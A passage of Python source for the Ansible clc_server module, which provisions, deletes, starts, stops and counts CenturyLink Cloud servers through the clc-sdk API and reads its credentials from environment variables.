# Note - You must set the CLC_V2_API_USERNAME and CLC_V2_API_PASSWORD environment variables before running these examples
- name: Provision a single Ubuntu Server
community.general.clc_server:
name: test
template: ubuntu-14-64
count: 1
group: Default Group
state: present
- name: Ensure 'Default Group' has exactly 5 servers
community.general.clc_server:
name: test
template: ubuntu-14-64
exact_count: 5
count_group: Default Group
group: Default Group
- name: Stop a Server
community.general.clc_server:
server_ids:
- UC1ACCT-TEST01
state: stopped
- name: Start a Server
community.general.clc_server:
server_ids:
- UC1ACCT-TEST01
state: started
- name: Delete a Server
community.general.clc_server:
server_ids:
- UC1ACCT-TEST01
state: absent
'''
RETURN = '''
server_ids:
description: The list of server ids that are created
returned: success
type: list
sample:
[
"UC1TEST-SVR01",
"UC1TEST-SVR02"
]
partially_created_server_ids:
description: The list of server ids that are partially created
returned: success
type: list
sample:
[
"UC1TEST-SVR01",
"UC1TEST-SVR02"
]
servers:
description: The list of server objects returned from CLC
returned: success
type: list
sample:
[
{
"changeInfo":{
"createdBy":"service.wfad",
"createdDate":1438196820,
"modifiedBy":"service.wfad",
"modifiedDate":1438196820
},
"description":"test-server",
"details":{
"alertPolicies":[
],
"cpu":1,
"customFields":[
],
"diskCount":3,
"disks":[
{
"id":"0:0",
"partitionPaths":[
],
"sizeGB":1
},
{
"id":"0:1",
"partitionPaths":[
],
"sizeGB":2
},
{
"id":"0:2",
"partitionPaths":[
],
"sizeGB":14
}
],
"hostName":"",
"inMaintenanceMode":false,
"ipAddresses":[
{
"internal":"10.1.1.1"
}
],
"memoryGB":1,
"memoryMB":1024,
"partitions":[
],
"powerState":"started",
"snapshots":[
],
"storageGB":17
},
"groupId":"086ac1dfe0b6411989e8d1b77c4065f0",
"id":"test-server",
"ipaddress":"10.120.45.23",
"isTemplate":false,
"links":[
{
"href":"/v2/servers/wfad/test-server",
"id":"test-server",
"rel":"self",
"verbs":[
"GET",
"PATCH",
"DELETE"
]
},
{
"href":"/v2/groups/wfad/086ac1dfe0b6411989e8d1b77c4065f0",
"id":"086ac1dfe0b6411989e8d1b77c4065f0",
"rel":"group"
},
{
"href":"/v2/accounts/wfad",
"id":"wfad",
"rel":"account"
},
{
"href":"/v2/billing/wfad/serverPricing/test-server",
"rel":"billing"
},
{
"href":"/v2/servers/wfad/test-server/publicIPAddresses",
"rel":"publicIPAddresses",
"verbs":[
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/credentials",
"rel":"credentials"
},
{
"href":"/v2/servers/wfad/test-server/statistics",
"rel":"statistics"
},
{
"href":"/v2/servers/wfad/510ec21ae82d4dc89d28479753bf736a/upcomingScheduledActivities",
"rel":"upcomingScheduledActivities"
},
{
"href":"/v2/servers/wfad/510ec21ae82d4dc89d28479753bf736a/scheduledActivities",
"rel":"scheduledActivities",
"verbs":[
"GET",
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/capabilities",
"rel":"capabilities"
},
{
"href":"/v2/servers/wfad/test-server/alertPolicies",
"rel":"alertPolicyMappings",
"verbs":[
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/antiAffinityPolicy",
"rel":"antiAffinityPolicyMapping",
"verbs":[
"PUT",
"DELETE"
]
},
{
"href":"/v2/servers/wfad/test-server/cpuAutoscalePolicy",
"rel":"cpuAutoscalePolicyMapping",
"verbs":[
"PUT",
"DELETE"
]
}
],
"locationId":"UC1",
"name":"test-server",
"os":"ubuntu14_64Bit",
"osType":"Ubuntu 14 64-bit",
"status":"active",
"storageType":"standard",
"type":"standard"
}
]
'''
__version__ = '${version}'
import json
import os
import time
import traceback
from distutils.version import LooseVersion
REQUESTS_IMP_ERR = None
try:
import requests
except ImportError:
REQUESTS_IMP_ERR = traceback.format_exc()
REQUESTS_FOUND = False
else:
REQUESTS_FOUND = True
#
# Requires the clc-python-sdk.
# sudo pip install clc-sdk
#
CLC_IMP_ERR = None
try:
import clc as clc_sdk
from clc import CLCException
from clc import APIFailedResponse
except ImportError:
CLC_IMP_ERR = traceback.format_exc()
CLC_FOUND = False
clc_sdk = None
else:
CLC_FOUND = True
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
class ClcServer:
clc = clc_sdk
def __init__(self, module):
"""
Construct module
"""
self.clc = clc_sdk
self.module = module
self.group_dict = {}
if not CLC_FOUND:
self.module.fail_json(msg=missing_required_lib('clc-sdk'), exception=CLC_IMP_ERR)
if not REQUESTS_FOUND:
self.module.fail_json(msg=missing_required_lib('requests'), exception=REQUESTS_IMP_ERR)
if requests.__version__ and LooseVersion(
requests.__version__) < LooseVersion('2.5.0'):
self.module.fail_json(
msg='requests library version should be >= 2.5.0')
self._set_user_agent(self.clc)
def process_request(self):
"""
Process the request - Main Code Path
:return: Returns with either an exit_json or fail_json
"""
changed = False
new_server_ids = []
server_dict_array = []
self._set_clc_credentials_from_env()
self.module.params = self._validate_module_params(
self.clc,
self.module)
p = self.module.params
state = p.get('state')
#
# Handle each state
#
partial_servers_ids = []
if state == 'absent':
server_ids = p['server_ids']
if not isinstance(server_ids, list):
return self.module.fail_json(
msg='server_ids needs to be a list of instances to delete: %s' %
server_ids)
(changed,
server_dict_array,
new_server_ids) = self._delete_servers(module=self.module,
clc=self.clc,
server_ids=server_ids)
elif state in ('started', 'stopped'):
server_ids = p.get('server_ids')
if not isinstance(server_ids, list):
return self.module.fail_json(
msg='server_ids needs to be a list of servers to run: %s' %
server_ids)
(changed,
server_dict_array,
new_server_ids) = self._start_stop_servers(self.module,
self.clc,
server_ids)
elif state == 'present':
# Changed is always set to true when provisioning new instances
if not p.get('template') and p.get('type') != 'bareMetal':
return self.module.fail_json(
msg='template parameter is required for new instance')
if p.get('exact_count') is None:
(server_dict_array,
new_server_ids,
partial_servers_ids,
changed) = self._create_servers(self.module,
self.clc)
else:
(server_dict_array,
new_server_ids,
partial_servers_ids,
changed) = self._enforce_count(self.module,
self.clc)
self.module.exit_json(
changed=changed,
server_ids=new_server_ids,
partially_created_server_ids=partial_servers_ids,
servers=server_dict_array)
@staticmethod
def _define_module_argument_spec():
"""
Define the argument spec for the ansible module
:return: argument spec dictionary
"""
argument_spec = dict(
name=dict(),
template=dict(),
group=dict(default='Default Group'),
network_id=dict(),
location=dict(default=None),
cpu=dict(default=1, type='int'),
memory=dict(default=1, type='int'),
alias=dict(default=None),
password=dict(default=None, no_log=True),
ip_address=dict(default=None),
storage_type=dict(
default='standard',
choices=[
'standard',
'hyperscale']),
type=dict(default='standard', choices=['standard', 'hyperscale', 'bareMetal']),
primary_dns=dict(default=None),
secondary_dns=dict(default=None),
additional_disks=dict(type='list', default=[], elements='dict'),
custom_fields=dict(type='list', default=[], elements='dict'),
ttl=dict(default=None),
managed_os=dict(type='bool', default=False),
description=dict(default=None),
source_server_password=dict(default=None, no_log=True),
cpu_autoscale_policy_id=dict(default=None),
anti_affinity_policy_id=dict(default=None),
anti_affinity_policy_name=dict(default=None),
alert_policy_id=dict(default=None),
alert_policy_name=dict(default=None),
packages=dict(type='list', default=[], elements='dict'),
state=dict(
default='present',
choices=[
'present',
'absent',
'started',
'stopped']),
count=dict(type='int', default=1),
exact_count=dict(type='int', default=None),
count_group=dict(),
server_ids=dict(type='list', default=[], elements='str'),
add_public_ip=dict(type='bool', default=False),
public_ip_protocol=dict(
default='TCP',
choices=[
'TCP',
'UDP',
'ICMP']),
public_ip_ports=dict(type='list', default=[], elements='dict'),
configuration_id=dict(default=None),
os_type=dict(default=None,
choices=[
'redHat6_64Bit',
'centOS6_64Bit',
'windows2012R2Standard_64Bit',
'ubuntu14_64Bit'
]),
wait=dict(type='bool', default=True))
mutually_exclusive = [
['exact_count', 'count'],
['exact_count', 'state'],
['anti_affinity_policy_id', 'anti_affinity_policy_name'],
['alert_policy_id', 'alert_policy_name'],
]
return {"argument_spec": argument_spec,
"mutually_exclusive": mutually_exclusive}
def _set_clc_credentials_from_env(self):
"""
Set the CLC Credentials on the sdk by reading environment variables
:return: none
"""
env = os.environ
v2_api_token = env.get('CLC_V2_API_TOKEN', False)
v2_api_username = env.get('CLC_V2_API_USERNAME', False)
v2_api_passwd = env.get('CLC_V2_API_PASSWD', False)
clc_alias = env.get('CLC_ACCT_ALIAS', False)
api_url = env.get('CLC_V2_API_URL', False)
if api_url:
self.clc.defaults.ENDPOINT_URL_V2 = api_url
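        # Token-based auth (CLC_V2_API_TOKEN + CLC_ACCT_ALIAS) takes precedence
        # over username/password credentials when both sets are present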
if v2_api_token and clc_alias:
self.clc._LOGIN_TOKEN_V2 = v2_api_token
self.clc._V2_ENABLED = True
self.clc.ALIAS = clc_alias
elif v2_api_username and v2_api_passwd:
self.clc.v2.SetCredentials(
api_username=v2_api_username,
api_passwd=v2_api_passwd)
else:
return self.module.fail_json(
msg="You must set the CLC_V2_API_USERNAME and CLC_V2_API_PASSWD "
"environment variables")
@staticmethod
def _validate_module_params(clc, module):
"""
        Validate the module params, and look up default values.
:param clc: clc-sdk instance to use
:param module: module to validate
:return: dictionary of validated params
"""
params = module.params
datacenter = ClcServer._find_datacenter(clc, module)
ClcServer._validate_types(module)
ClcServer._validate_name(module)
params['alias'] = ClcServer._find_alias(clc, module)
params['cpu'] = ClcServer._find_cpu(clc, module)
params['memory'] = ClcServer._find_memory(clc, module)
params['description'] = ClcServer._find_description(module)
params['ttl'] = ClcServer._find_ttl(clc, module)
params['template'] = ClcServer._find_template_id(module, datacenter)
params['group'] = ClcServer._find_group(module, datacenter).id
params['network_id'] = ClcServer._find_network_id(module, datacenter)
params['anti_affinity_policy_id'] = ClcServer._find_aa_policy_id(
clc,
module)
params['alert_policy_id'] = ClcServer._find_alert_policy_id(
clc,
module)
return params
@staticmethod
def _find_datacenter(clc, module):
"""
Find the datacenter by calling the CLC API.
:param clc: clc-sdk instance to use
:param module: module to validate
:return: clc-sdk.Datacenter instance
"""
location = module.params.get('location')
try:
if not location:
account = clc.v2.Account()
location = account.data.get('primaryDataCenter')
data_center = clc.v2.Datacenter(location)
return data_center
except CLCException:
module.fail_json(msg="Unable to find location: {0}".format(location))
@staticmethod
def _find_alias(clc, module):
"""
Find or Validate the Account Alias by calling the CLC API
:param clc: clc-sdk instance to use
:param module: module to validate
        :return: the validated account alias string
"""
alias = module.params.get('alias')
if not alias:
try:
alias = clc.v2.Account.GetAlias()
except CLCException as ex:
module.fail_json(msg='Unable to find account alias. {0}'.format(
ex.message
))
return alias
@staticmethod
def _find_cpu(clc, module):
"""
Find or validate the CPU value by calling the CLC API
:param clc: clc-sdk instance to use
:param module: module to validate
:return: Int value for CPU
"""
cpu = module.params.get('cpu')
group_id = module.params.get('group_id')
alias = module.params.get('alias')
state = module.params.get('state')
if not cpu and state == 'present':
group = clc.v2.Group(id=group_id,
alias=alias)
if group.Defaults("cpu"):
cpu = group.Defaults("cpu")
else:
                module.fail_json(
                    msg="Can't determine a default cpu value. Please provide a value for cpu.")
return cpu
@staticmethod
def _find_memory(clc, module):
"""
Find or validate the Memory value by calling the CLC API
:param clc: clc-sdk instance to use
:param module: module to validate
:return: Int value for Memory
"""
memory = module.params.get('memory')
group_id = module.params.get('group_id')
alias = module.params.get('alias')
state = module.params.get('state')
if not memory and state == 'present':
group = clc.v2.Group(id=group_id,
alias=alias)
if group.Defaults("memory"):
memory = group.Defaults("memory")
else:
                module.fail_json(
                    msg="Can't determine a default memory value. Please provide a value for memory.")
return memory
@staticmethod
def _find_description(module):
"""
Set the description module param to name if description is blank
:param module: the module to validate
:return: string description
"""
description = module.params.get('description')
if not description:
description = module.params.get('name')
return description
@staticmethod
def _validate_types(module):
"""
Validate that type and storage_type are set appropriately, and fail if not
:param module: the module to validate
:return: none
"""
state = module.params.get('state')
server_type = module.params.get(
'type').lower() if module.params.get('type') else None
storage_type = module.params.get(
'storage_type').lower() if module.params.get('storage_type') else None
if state == "present":
if server_type == "standard" and storage_type not in (
"standard", "premium"):
module.fail_json(
msg=str("Standard VMs must have storage_type = 'standard' or 'premium'"))
if server_type == "hyperscale" and storage_type != "hyperscale":
module.fail_json(
msg=str("Hyperscale VMs must have storage_type = 'hyperscale'"))
@staticmethod
def _validate_name(module):
"""
Validate that name is the correct length if provided, fail if it's not
:param module: the module to validate
:return: none
"""
server_name = module.params.get('name')
state = module.params.get('state')
        if state == 'present' and (
                not server_name or len(server_name) > 6):
            module.fail_json(
                msg="When state = 'present', name must be a string with a minimum length of 1 and a maximum length of 6")
@staticmethod
def _find_ttl(clc, module):
"""
Validate that TTL is > 3600 if set, and fail if not
:param clc: clc-sdk instance to use
:param module: module to validate
:return: validated ttl
"""
ttl = module.params.get('ttl')
if ttl:
            if ttl <= 3600:
                return module.fail_json(msg="ttl must be greater than 3600 seconds")
else:
ttl = clc.v2.time_utils.SecondsToZuluTS(int(time.time()) + ttl)
return ttl
@staticmethod
def _find_template_id(module, datacenter):
"""
Find the template id by calling the CLC API.
:param module: the module to validate
:param datacenter: the datacenter to search for the template
:return: a valid clc template id
"""
lookup_template = module.params.get('template')
state = module.params.get('state')
        server_type = module.params.get('type')
        result = None
        if state == 'present' and server_type != 'bareMetal':
            try:
                result = datacenter.Templates().Search(lookup_template)[0].id
            except (CLCException, IndexError):
                module.fail_json(
                    msg="Unable to find a template: {0} in location: {1}".format(
                        lookup_template, datacenter.id))
return result
@staticmethod
def _find_network_id(module, datacenter):
"""
Validate the provided network id or return a default.
:param module: the module to validate
:param datacenter: the datacenter to search for a network id
:return: a valid network id
"""
network_id = module.params.get('network_id')
if not network_id:
try:
network_id = datacenter.Networks().networks[0].id
# -- added for clc-sdk 2.23 compatibility
# datacenter_networks = clc_sdk.v2.Networks(
# networks_lst=datacenter._DeploymentCapabilities()['deployableNetworks'])
# network_id = datacenter_networks.networks[0].id
# -- end
            except (CLCException, IndexError):
                module.fail_json(
                    msg="Unable to find a network in location: {0}".format(
                        datacenter.id))
return network_id
@staticmethod
def _find_aa_policy_id(clc, module):
"""
        Validate that the anti-affinity policy exists for the given name, failing if it does not
:param clc: the clc-sdk instance
:param module: the module to validate
:return: aa_policy_id: the anti affinity policy id of the given name.
"""
aa_policy_id = module.params.get('anti_affinity_policy_id')
aa_policy_name = module.params.get('anti_affinity_policy_name')
if not aa_policy_id and aa_policy_name:
alias = module.params.get('alias')
aa_policy_id = ClcServer._get_anti_affinity_policy_id(
clc,
module,
alias,
aa_policy_name)
if not aa_policy_id:
module.fail_json(
                    msg='No anti affinity policy was found with policy name: %s' % aa_policy_name)
return aa_policy_id
@staticmethod
def _find_alert_policy_id(clc, module):
"""
        Validate that the alert policy exists for the given name, failing if it does not
:param clc: the clc-sdk instance
:param module: the module to validate
:return: alert_policy_id: the alert policy id of the given name.
"""
alert_policy_id = module.params.get('alert_policy_id')
alert_policy_name = module.params.get('alert_policy_name')
if not alert_policy_id and alert_policy_name:
alias = module.params.get('alias')
alert_policy_id = ClcServer._get_alert_policy_id_by_name(
clc=clc,
module=module,
alias=alias,
alert_policy_name=alert_policy_name
)
if not alert_policy_id:
module.fail_json(
                    msg='No alert policy exists with name: %s' % alert_policy_name)
return alert_policy_id
def _create_servers(self, module, clc, override_count=None):
"""
Create New Servers in CLC cloud
:param module: the AnsibleModule object
:param clc: the clc-sdk instance to use
        :param override_count: optional server count that overrides the 'count' module param
        :return: a tuple of (server dict list, created server ids, partially created server ids, changed flag)
"""
p = module.params
request_list = []
servers = []
server_dict_array = []
created_server_ids = []
partial_created_servers_ids = []
add_public_ip = p.get('add_public_ip')
public_ip_protocol = p.get('public_ip_protocol')
public_ip_ports = p.get('public_ip_ports')
params = {
'name': p.get('name'),
'template': p.get('template'),
'group_id': p.get('group'),
'network_id': p.get('network_id'),
'cpu': p.get('cpu'),
'memory': p.get('memory'),
'alias': p.get('alias'),
'password': p.get('password'),
'ip_address': p.get('ip_address'),
'storage_type': p.get('storage_type'),
'type': p.get('type'),
'primary_dns': p.get('primary_dns'),
'secondary_dns': p.get('secondary_dns'),
'additional_disks': p.get('additional_disks'),
'custom_fields': p.get('custom_fields'),
'ttl': p.get('ttl'),
'managed_os': p.get('managed_os'),
'description': p.get('description'),
'source_server_password': p.get('source_server_password'),
'cpu_autoscale_policy_id': p.get('cpu_autoscale_policy_id'),
'anti_affinity_policy_id': p.get('anti_affinity_policy_id'),
'packages': p.get('packages'),
'configuration_id': p.get('configuration_id'),
'os_type': p.get('os_type')
}
count = override_count if override_count else p.get('count')
        changed = count > 0
if not changed:
return server_dict_array, created_server_ids, partial_created_servers_ids, changed
for i in range(0, count):
if not module.check_mode:
req = self._create_clc_server(clc=clc,
module=module,
server_params=params)
server = req.requests[0].Server()
request_list.append(req)
servers.append(server)
self._wait_for_requests(module, request_list)
self._refresh_servers(module, servers)
ip_failed_servers = self._add_public_ip_to_servers(
module=module,
should_add_public_ip=add_public_ip,
servers=servers,
public_ip_protocol=public_ip_protocol,
public_ip_ports=public_ip_ports)
ap_failed_servers = self._add_alert_policy_to_servers(clc=clc,
module=module,
servers=servers)
for server in servers:
if server in ip_failed_servers or server in ap_failed_servers:
partial_created_servers_ids.append(server.id)
else:
# reload server details
server = clc.v2.Server(server.id)
server.data['ipaddress'] = server.details[
'ipAddresses'][0]['internal']
if add_public_ip and len(server.PublicIPs().public_ips) > 0:
server.data['publicip'] = str(
server.PublicIPs().public_ips[0])
created_server_ids.append(server.id)
server_dict_array.append(server.data)
return server_dict_array, created_server_ids, partial_created_servers_ids, changed
def _enforce_count(self, module, clc):
"""
Enforce that there is the right number of servers in the provided group.
Starts or stops servers as necessary.
:param module: the AnsibleModule object
:param clc: the clc-sdk instance to use
        :return: a tuple of (server dict list, changed server ids, partially created server ids, changed flag)
"""
p = module.params
changed = False
count_group = p.get('count_group')
datacenter = ClcServer._find_datacenter(clc, module)
exact_count = p.get('exact_count')
server_dict_array = []
partial_servers_ids = []
changed_server_ids = []
# fail here if the exact count was specified without filtering
        # on a group, as this may lead to an undesired removal of instances
if exact_count and count_group is None:
return module.fail_json(
msg="you must use the 'count_group' option with exact_count")
servers, running_servers = ClcServer._find_running_servers_by_group(
module, datacenter, count_group)
if len(running_servers) == exact_count:
changed = False
elif len(running_servers) < exact_count:
to_create = exact_count - len(running_servers)
server_dict_array, changed_server_ids, partial_servers_ids, changed \
= self._create_servers(module, clc, override_count=to_create)
for server in server_dict_array:
running_servers.append(server)
elif len(running_servers) > exact_count:
to_remove = len(running_servers) - exact_count
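            # sort the ids so the trim is deterministic: the lexicographically
            # first server ids are removed first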
all_server_ids = sorted([x.id for x in running_servers])
remove_ids = all_server_ids[0:to_remove]
(changed, server_dict_array, changed_server_ids) \
= ClcServer._delete_servers(module, clc, remove_ids)
return server_dict_array, changed_server_ids, partial_servers_ids, changed
@staticmethod
def _wait_for_requests(module, request_list):
"""
Block until server provisioning requests are completed.
:param module: the AnsibleModule object
:param request_list: a list of clc-sdk.Request instances
:return: none
"""
wait = module.params.get('wait')
if wait:
# Requests.WaitUntilComplete() returns the count of failed requests
failed_requests_count = sum(
[request.WaitUntilComplete() for request in request_list])
if failed_requests_count > 0:
module.fail_json(
msg='Unable to process server request')
@staticmethod
def _refresh_servers(module, servers):
"""
Loop through a list of servers and refresh them.
:param module: the AnsibleModule object
:param servers: list of clc-sdk.Server instances to refresh
:return: none
"""
for server in servers:
try:
server.Refresh()
except CLCException as ex:
module.fail_json(msg='Unable to refresh the server {0}. {1}'.format(
server.id, ex.message
))
@staticmethod
def _add_public_ip_to_servers(
module,
should_add_public_ip,
servers,
public_ip_protocol,
public_ip_ports):
"""
Create a public IP for servers
:param module: the AnsibleModule object
:param should_add_public_ip: boolean - whether or not to provision a public ip for servers. Skipped if False
:param servers: List of servers to add public ips to
:param public_ip_protocol: a protocol to allow for the public ips
:param public_ip_ports: list of ports to allow for the public ips
        :return: failed_servers: the list of servers that failed to get a public ip
"""
failed_servers = []
if not should_add_public_ip:
return failed_servers
ports_lst = []
request_list = []
server = None
for port in public_ip_ports:
ports_lst.append(
{'protocol': public_ip_protocol, 'port': port})
try:
if not module.check_mode:
for server in servers:
request = server.PublicIPs().Add(ports_lst)
request_list.append(request)
except APIFailedResponse:
failed_servers.append(server)
ClcServer._wait_for_requests(module, request_list)
return failed_servers
@staticmethod
def _add_alert_policy_to_servers(clc, module, servers):
"""
Associate the alert policy to servers
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param servers: List of servers to add alert policy to
:return: failed_servers: the list of servers which failed while associating alert policy
"""
failed_servers = []
p = module.params
alert_policy_id = p.get('alert_policy_id')
alias = p.get('alias')
if alert_policy_id and not module.check_mode:
for server in servers:
try:
ClcServer._add_alert_policy_to_server(
clc=clc,
alias=alias,
server_id=server.id,
alert_policy_id=alert_policy_id)
except CLCException:
failed_servers.append(server)
return failed_servers
@staticmethod
def _add_alert_policy_to_server(
clc, alias, server_id, alert_policy_id):
"""
Associate an alert policy to a clc server
:param clc: the clc-sdk instance to use
:param alias: the clc account alias
:param server_id: The clc server id
:param alert_policy_id: the alert policy id to be associated to the server
:return: none
"""
try:
clc.v2.API.Call(
method='POST',
url='servers/%s/%s/alertPolicies' % (alias, server_id),
payload=json.dumps(
{
'id': alert_policy_id
}))
except APIFailedResponse as e:
raise CLCException(
'Failed to associate alert policy to the server : {0} with Error {1}'.format(
server_id, str(e.response_text)))
@staticmethod
def _get_alert_policy_id_by_name(clc, module, alias, alert_policy_name):
"""
Returns the alert policy id for the given alert policy name
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param alias: the clc account alias
:param alert_policy_name: the name of the alert policy
:return: alert_policy_id: the alert policy id
"""
alert_policy_id = None
policies = clc.v2.API.Call('GET', '/v2/alertPolicies/%s' % alias)
if not policies:
return alert_policy_id
for policy in policies.get('items'):
if policy.get('name') == alert_policy_name:
if not alert_policy_id:
alert_policy_id = policy.get('id')
else:
return module.fail_json(
                        msg='multiple alert policies were found with policy name: %s' % alert_policy_name)
return alert_policy_id
@staticmethod
def _delete_servers(module, clc, server_ids):
"""
Delete the servers on the provided list
:param module: the AnsibleModule object
:param clc: the clc-sdk instance to use
:param server_ids: list of servers to delete
        :return: a tuple of (changed flag, server dict list, terminated server ids)
"""
terminated_server_ids = []
server_dict_array = []
request_list = []
if not isinstance(server_ids, list) or len(server_ids) < 1:
return module.fail_json(
msg='server_ids should be a list of servers, aborting')
servers = clc.v2.Servers(server_ids).Servers()
for server in servers:
if not module.check_mode:
request_list.append(server.Delete())
ClcServer._wait_for_requests(module, request_list)
for server in servers:
terminated_server_ids.append(server.id)
return True, server_dict_array, terminated_server_ids
@staticmethod
def _start_stop_servers(module, clc, server_ids):
"""
Start or Stop the servers on the provided list
:param module: the AnsibleModule object
:param clc: the clc-sdk instance to use
:param server_ids: list of servers to start or stop
        :return: a tuple of (changed flag, server dict list, result server ids)
"""
p = module.params
state = p.get('state')
changed = False
changed_servers = []
server_dict_array = []
result_server_ids = []
request_list = []
if not isinstance(server_ids, list) or len(server_ids) < 1:
return module.fail_json(
msg='server_ids should be a list of servers, aborting')
servers = clc.v2.Servers(server_ids).Servers()
for server in servers:
if server.powerState != state:
changed_servers.append(server)
if not module.check_mode:
request_list.append(
ClcServer._change_server_power_state(
module,
server,
state))
changed = True
ClcServer._wait_for_requests(module, request_list)
ClcServer._refresh_servers(module, changed_servers)
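        # changed_servers is a subset of servers; iterating over the set union
        # ensures each server appears only once in the result payload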
for server in set(changed_servers + servers):
try:
server.data['ipaddress'] = server.details[
'ipAddresses'][0]['internal']
server.data['publicip'] = str(
server.PublicIPs().public_ips[0])
except (KeyError, IndexError):
pass
server_dict_array.append(server.data)
result_server_ids.append(server.id)
return changed, server_dict_array, result_server_ids
@staticmethod
def _change_server_power_state(module, server, state):
"""
Change the server powerState
:param module: the module to check for intended state
:param server: the server to start or stop
:param state: the intended powerState for the server
:return: the request object from clc-sdk call
"""
result = None
try:
if state == 'started':
result = server.PowerOn()
else:
# Try to shut down the server and fall back to power off when unable to shut down.
result = server.ShutDown()
if result and hasattr(result, 'requests') and result.requests[0]:
return result
else:
result = server.PowerOff()
except CLCException:
module.fail_json(
msg='Unable to change power state for server {0}'.format(
server.id))
return result
@staticmethod
def _find_running_servers_by_group(module, datacenter, count_group):
"""
Find a list of running servers in the provided group
:param module: the AnsibleModule object
:param datacenter: the clc-sdk.Datacenter instance to use to lookup the group
:param count_group: the group to count the servers
:return: list of servers, and list of running servers
"""
group = ClcServer._find_group(
module=module,
datacenter=datacenter,
lookup_group=count_group)
servers = group.Servers().Servers()
running_servers = []
for server in servers:
if server.status == 'active' and server.powerState == 'started':
running_servers.append(server)
return servers, running_servers
@staticmethod
def _find_group(module, datacenter, lookup_group=None):
"""
Find a server group in a datacenter by calling the CLC API
:param module: the AnsibleModule instance
:param datacenter: clc-sdk.Datacenter instance to search for the group
:param lookup_group: string name of the group to search for
:return: clc-sdk.Group instance
"""
if not lookup_group:
lookup_group = module.params.get('group')
try:
return datacenter.Groups().Get(lookup_group)
except CLCException:
pass
        # The search above only matches the top level of the group tree;
        # fall back to a recursive search through the subgroups
result = ClcServer._find_group_recursive(
module,
datacenter.Groups(),
lookup_group)
if result is None:
module.fail_json(
msg=str(
"Unable to find group: " +
lookup_group +
" in location: " +
datacenter.id))
return result
@staticmethod
def _find_group_recursive(module, group_list, lookup_group):
"""
Find a server group by recursively walking the tree
:param module: the AnsibleModule instance to use
:param group_list: a list of groups to search
:param lookup_group: the group to look for
        :return: the matching clc-sdk.Group instance, or None if no match is found
"""
result = None
for group in group_list.groups:
subgroups = group.Subgroups()
try:
return subgroups.Get(lookup_group)
except CLCException:
result = ClcServer._find_group_recursive(
module,
subgroups,
lookup_group)
if result is not None:
break
return result
@staticmethod
def _create_clc_server(
clc,
module,
server_params):
"""
Call the CLC Rest API to Create a Server
:param clc: the clc-python-sdk instance to use
:param module: the AnsibleModule instance to use
:param server_params: a dictionary of params to use to create the servers
:return: clc-sdk.Request object linked to the queued server request
"""
try:
res = clc.v2.API.Call(
method='POST',
url='servers/%s' %
(server_params.get('alias')),
payload=json.dumps(
{
'name': server_params.get('name'),
'description': server_params.get('description'),
'groupId': server_params.get('group_id'),
'sourceServerId': server_params.get('template'),
'isManagedOS': server_params.get('managed_os'),
'primaryDNS': server_params.get('primary_dns'),
'secondaryDNS': server_params.get('secondary_dns'),
'networkId': server_params.get('network_id'),
'ipAddress': server_params.get('ip_address'),
'password': server_params.get('password'),
'sourceServerPassword': server_params.get('source_server_password'),
'cpu': server_params.get('cpu'),
'cpuAutoscalePolicyId': server_params.get('cpu_autoscale_policy_id'),
'memoryGB': server_params.get('memory'),
'type': server_params.get('type'),
'storageType': server_params.get('storage_type'),
'antiAffinityPolicyId': server_params.get('anti_affinity_policy_id'),
'customFields': server_params.get('custom_fields'),
'additionalDisks': server_params.get('additional_disks'),
'ttl': server_params.get('ttl'),
'packages': server_params.get('packages'),
'configurationId': server_params.get('configuration_id'),
'osType': server_params.get('os_type')}))
result = clc.v2.Requests(res)
except APIFailedResponse as ex:
return module.fail_json(msg='Unable to create the server: {0}. {1}'.format(
server_params.get('name'),
ex.response_text
))
#
# Patch the Request object so that it returns a valid server
# Find the server's UUID from the API response
server_uuid = [obj['id']
for obj in res['links'] if obj['rel'] == 'self'][0]
# Change the request server method to a _find_server_by_uuid closure so
# that it will work
result.requests[0].Server = lambda: ClcServer._find_server_by_uuid_w_retry(
clc,
module,
server_uuid,
server_params.get('alias'))
return result
@staticmethod
def _get_anti_affinity_policy_id(clc, module, alias, aa_policy_name):
"""
        Retrieve the anti-affinity policy id for the given policy name
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param alias: the CLC account alias
:param aa_policy_name: the anti affinity policy name
:return: aa_policy_id: The anti affinity policy id
"""
aa_policy_id = None
try:
aa_policies = clc.v2.API.Call(method='GET',
url='antiAffinityPolicies/%s' % alias)
except APIFailedResponse as ex:
return module.fail_json(msg='Unable to fetch anti affinity policies for account: {0}. {1}'.format(
alias, ex.response_text))
for aa_policy in aa_policies.get('items'):
if aa_policy.get('name') == aa_policy_name:
if not aa_policy_id:
aa_policy_id = aa_policy.get('id')
else:
return module.fail_json(
                        msg='multiple anti affinity policies were found with policy name: %s' % aa_policy_name)
return aa_policy_id
#
    # This is the function that gets patched onto Request.Server using a lambda closure
#
@staticmethod
def _find_server_by_uuid_w_retry(
clc, module, svr_uuid, alias=None, retries=5, back_out=2):
"""
Find the clc server by the UUID returned from the provisioning request. Retry the request if a 404 is returned.
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param svr_uuid: UUID of the server
        :param alias: the Account Alias to search
        :param retries: the number of retry attempts to make before failing. default is 5
        :param back_out: the initial back-off delay in seconds, doubled after each retry. default is 2
:return: a clc-sdk.Server instance
"""
if not alias:
alias = clc.v2.Account.GetAlias()
# Wait and retry if the api returns a 404
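        # With the defaults (retries=5, back_out=2) up to five attempts are made,
        # sleeping 2, 4, 8 and 16 seconds between successive attempts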
while True:
retries -= 1
try:
server_obj = clc.v2.API.Call(
method='GET', url='servers/%s/%s?uuid=true' %
(alias, svr_uuid))
server_id = server_obj['id']
server = clc.v2.Server(
id=server_id,
alias=alias,
server_obj=server_obj)
return server
except APIFailedResponse as e:
if e.response_status_code != 404:
return module.fail_json(
msg='A failure response was received from CLC API when '
'attempting to get details for a server: UUID=%s, Code=%i, Message=%s' %
(svr_uuid, e.response_status_code, e.message))
if retries == 0:
return module.fail_json(
                        msg='Unable to reach the CLC API after exhausting all retry attempts')
time.sleep(back_out)
back_out *= 2
@staticmethod
def _set_user_agent(clc):
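        """Tag clc-sdk HTTP calls with a module-identifying user agent, when the sdk supports session injection."""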
if hasattr(clc, 'SetRequestsSession'):
agent_string = "ClcAnsibleModule/" + __version__
ses = requests.Session()
ses.headers.update({"Api-Client": agent_string})
ses.headers['User-Agent'] += " " + agent_string
clc.SetRequestsSession(ses)
def main():
"""
